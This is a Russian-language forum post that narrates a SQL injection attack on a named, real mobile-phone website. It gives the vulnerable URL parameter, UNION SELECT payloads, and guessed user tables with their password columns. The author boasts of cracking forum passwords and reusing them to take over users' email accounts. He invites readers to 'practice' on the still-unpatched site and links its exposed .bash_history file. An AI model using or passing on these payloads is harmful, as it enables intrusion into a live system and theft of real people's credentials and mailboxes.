SQL уколы на примере

D

DeaDevil

Для всех наверно давно уже не секрет, что из себя представляет очень распространенная уязвимость sql-injection.
С ее помощью можно стырить кучу паролей, поиметь веб-шелл, ну и в конечном итоге и весь сервак.
Вот щас расскажу вам реальный пример.

Искал я для своей мобилки ченить интересное и наткнулся на сайтик http://www.sota1.ru. и сразу в глаза мне кинулся параметр week_news.php3?News_id=1324
Уже по превычке решил вставить кавычку и получил желаемый ответ сервера
об ошибке запроса к базе mysql. Что ж, меня это порадовало =)
Пошел подбирать количество столбцов. Их оказалось 9.
тоесть мой запрос выглядел примерно так

http:// www.sota1.ru/week_news.php3?News_id[/url] = -1234+union+select+1,2,3,4,5,6,7,8,9/*

Укольчик оказался с выводом данных на страничке, я увидел следующие числа на своем телевизоре 1,3,7,8,9.
Дальше мне предстояло подобрать с помощью перебора имя таблиц
Вот какие я смог угадать
user
users
phpbb_users
Тоесть запросы были такого вида

http:// www.sota1.ru/week_news.php3?News_id= - 1234+union+select+1,2,3,4,5,6,7,8,9+from+user/*
http:// www.sota1.ru/week_news.php3?News_id = -1234+union+select+1,2,3,4,5,6,7,8,9+from+users/*
http:// www.sota1.ru/week_news.php3?News_id = -1234+union+select+1,2,3,4,5,6,7,8,9+from+phpbb_use r/*

Ну теперь осталось выяснить имена существующих колонок в кажой из таблиц

в таблице user нашел email,login,name,password
в таблице users -- email,login,pwd
в таблице phpbb_users по памяти нашел user_email,user_icq,user_id,user_password,username

Просмотрев данные пользователей и расшифровав пароли от форума
решил проверить их пароли к ихнем email адресам и так я поимел целую кучу емаил акков =))
На этом я пока остановился, написал письмо админам но они походу забили на этот сайт и в момент написания этой статьи дыра продолжает существовать.
Так что думаю вы можете потренироватся на нем
Кстати в корне сайта лежит и bash_history
Вот он http://www.sota1.ru/.bash_history

(с) ErrNick
 
  • Спасибо!
Реакции: Paha
Сверху